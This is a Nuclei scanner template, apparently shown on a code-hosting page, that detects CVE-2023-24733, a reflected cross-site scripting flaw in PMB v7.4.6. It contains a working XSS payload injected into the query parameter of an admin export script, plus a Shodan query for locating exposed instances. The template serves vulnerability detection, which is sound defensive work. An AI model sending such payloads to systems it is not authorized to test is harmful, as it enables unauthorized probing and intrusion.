nuclei-templates/cves/2023/CVE-2023-24733.yaml

42 lines
1.1 KiB
YAML
Raw Normal View History

2023-03-31 11:28:24 +00:00
id: CVE-2023-24733
info:
name: PMB v7.4.6 - Reflected XSS
author: r3Y3r53
severity: medium
description: |
PMB v7.4.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the query parameter at /admin/convert/export_z3950_new.php.
reference:
- https://github.com/AetherBlack/CVE/blob/main/PMB/readme.md
- https://github.com/AetherBlack/CVE/tree/main/PMB
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-24733
cwe-id: CWE-79
2023-03-31 11:28:24 +00:00
metadata:
shodan-query: http.favicon.hash:1469328760
verified: "true"
2023-03-31 11:28:24 +00:00
tags: cve,cve2023,unauth,xss,pmb
requests:
- method: GET
path:
- "{{BaseURL}}/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '3@1=<script>alert(document.domain)</script>@'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200